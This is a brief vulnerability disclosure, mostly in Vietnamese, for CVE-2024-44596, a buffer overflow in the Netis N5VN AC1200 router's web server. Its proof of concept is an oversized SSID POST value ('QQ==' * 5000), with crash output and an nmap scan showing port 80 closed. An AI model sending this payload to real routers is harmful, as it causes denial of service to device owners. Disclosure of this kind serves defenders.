Exploit Title: Netis N5VN AC1200 - Lỗi tràn bộ đệm (Buffer Overflow) và tấn công từ chối dịch vụ (DoS)
-
Ngày: 05/03/2024
-
Tác giả: Van Lam Nguyen
-
Facebook: fb.com/vanlam1412
-
Vendor Homepage: Netis Systems
-
Version: Netis N5VN AC1200 V1.0.1.1742
-
Tested on: Windows
-
CVE : CVE-2024-44596
Overview
-
Tồn tại lỗ hổng tràn bộ đệm trong bộ định tuyến Netis N5VN AC1200 cho phép kẻ tấn công làm sập máy chủ web đang chạy trên bộ định tuyến bằng cách gửi một yêu cầu được tạo sẵn.
-
Để khôi phục lại máy chủ web (HTTP), người dùng phải khởi động lại bộ định tuyến.
Proof of Concept (Use python)
-
Yêu cầu POST để thay đổi SSID Mạng không dây 2.4G (‘ssid’: ‘QQ==’ * 5000)
-
Successfully: (‘Connection aborted.’, ConnectionResetError(10054, ‘An existing connection was forcibly closed by the remote host’, None, 10054, None))
-
nmap 192.168.1.254 -p 80 80/tcp closed http